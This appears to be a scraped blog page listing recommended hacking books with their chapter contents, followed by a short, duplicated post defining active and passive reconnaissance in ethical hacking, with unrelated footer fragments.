- Chapter 19: Fuzzing, Porting Exploits, and Metasploit Modules
- Chapter 20: Using the Smartphone Pentesting Framework
Download Penetration Testing: A Hands-On Introduction To Hacking.
4. THE SHELLCODER'S HANDBOOK
This book is about learning shellcode's of the OS and how OS can be exploited. This book is all about discovering and exploiting security holes in devices to take over.
Authors: Chris Anley, John Heasman, Felix "FX" Linder, Gerardo Richarte.
CONTENTS
- Stack Overflows
- Shellcode
- Introduction to Format String Bugs
- Windows Shellcode
- Windows Overflows
- Overcoming Filters
- Introduction to Solaris Exploitation
- OS X Shellcode
- Cisco IOS Exploitation
- Protection Mechanisms
- Establishing a Working Environment
- Fault Injection
- The Art of Fuzzing
- Beyond Recognition: A Real Vulnerability versus a Bug
- Instrumented Investigation: A Manual Approach
- Tracing for Vulnerabilities
- Binary Auditing: Hacking Closed Source Software
- Alternative Payload Strategies
- Writing Exploits that Work in the Wild
- Attacking Database Software
- Unix Kernel Overflows
- Exploiting Unix Kernel Vulnerabilities
- Hacking the Windows Kernel
Download The ShellCoder's HandBook.
5. THE HACKER'S HANDBOOK WEB APPLICATION SECURITY FLAWS
This handbook is about finding and exploiting the web applications.
Authors: Dafydd Stuttard, Marcus Pinto.
CONTENTS
- Chapter 1 Web Application (In)security
- Chapter 2 Core Defense Mechanisms
- Chapter 3 Web Application Technologies
- Chapter 4 Mapping the Application
- Chapter 5 Bypassing Client-Side Controls
- Chapter 6 Attacking Authentication
- Chapter 7 Attacking Session Management
- Chapter 8 Attacking Access Controls
- Chapter 9 Attacking Data Stores
- Chapter 10 Attacking Back-End Components
- Chapter 11 Attacking Application Logic
- Chapter 12 Attacking Users: Cross-Site Scripting
- Chapter 13 Attacking Users: Other Techniques
- Chapter 14 Automating Customized Attacks
- Chapter 15 Exploiting Information Disclosure
- Chapter 16 Attacking Native Compiled Applications
- Chapter 17 Attacking Application Architecture
- Chapter 18 Attacking the Application Server
- Chapter 19 Finding Vulnerabilities in Source Code
- Chapter 20 A Web Application Hacker's Toolkit
- Chapter 21 A Web Application Hacker's Methodology
So, these are the top 5 best hacking books on the market. There may be more fascinating books in the future that make take place in the top list. But for now, these are the best hacking books. Read and share your experience with these books.
Friday, April 24, 2020
RECONNAISSANCE IN ETHICAL HACKING
What is reconnaissance in ethical hacking?
This is the primary phase of hacking where the hacker tries to collect as much information as possible about the target.It includes identifying the target ip address range,network,domain,mail server records etc.
They are of two types-
Active Reconnaissance
Passive Reconnaissance
1-Active Reconnaissance-It the process from which we directly interact with the computer system to gain information. This information can be relevant and accurate but there is a risk of getting detected if you are planning active reconnaissance without permission.if you are detected then the administration will take the severe action action against you it may be jail!
Passive Reconnaissance-In this process you will not be directly connected to a computer system.This process is used to gather essential information without ever interacting with the target system.
This is the primary phase of hacking where the hacker tries to collect as much information as possible about the target.It includes identifying the target ip address range,network,domain,mail server records etc.
They are of two types-
Active Reconnaissance
Passive Reconnaissance
1-Active Reconnaissance-It the process from which we directly interact with the computer system to gain information. This information can be relevant and accurate but there is a risk of getting detected if you are planning active reconnaissance without permission.if you are detected then the administration will take the severe action action against you it may be jail!
Passive Reconnaissance-In this process you will not be directly connected to a computer system.This process is used to gather essential information without ever interacting with the target system.
More information
This Weekend! Youth Climate Summit & Outreach Kick-Off Call
| | ||||||||||||||||||||||||||||||
| ||||||||||||||||||||||||||||||
Subscribe to:
Posts (Atom)